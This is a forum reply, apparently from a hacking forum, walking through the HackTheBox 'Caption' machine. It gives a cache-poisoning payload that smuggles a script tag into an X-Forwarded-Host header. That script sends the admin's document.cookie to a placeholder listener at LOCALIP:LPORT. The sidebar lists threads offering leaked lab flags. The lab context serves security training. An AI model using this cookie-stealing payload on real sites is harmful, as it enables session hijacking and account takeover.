Jan 12, 2025, 02:57 AM
|
HTB Caption - Linux - Hard
by mhsoraa - Saturday September 14, 2024 at 06:31 PM
|
|
Jan 24, 2025, 10:20 PM
(Jan 12, 2025, 02:57 AM)BlackBeer Wrote:(Nov 29, 2024, 05:34 PM)cutearmadillo Wrote: You use cache poisoning to insert malicious javascript into the page I'm not sure if i can atm, cause im at work and using a VM. but I sent the request when i first traversed to the /Firewalls page to repeater in burp and set up a listener: python3 -m http.server {listenerport} then sent ``` X-Forwarded-Host: 127.0.0.1"> </script> <script src="http://LOCALIP:LPORT/exploit.js"></script> <!-- ``` with the script containing ``` X-Forwarded-Host: 127.0.0.1"> </script> <script>new Image().src="http://LOCALIP:LPORT/?c="+encodeURI(document.cookie);</script><!-- ``` Then waited for my listener to catch the admin's cookie via the .js script that had been placed in the webcache Hope this helps, ping me later if it doesnt and i'll see if i can do any more |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] CPTS 12 FLAGS | 66 | 1,760 |
1 hour ago Last Post: vlka |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 370 | 92,442 |
6 hours ago Last Post: lifolifo007 |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,207 |
9 hours ago Last Post: kkkato |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 20 | 2,521 |
Yesterday, 11:06 PM Last Post: op334 |
||
|
[FREE] HackTheBox All Cheatsheets | 3 | 413 |
Yesterday, 10:36 PM Last Post: op334 |
|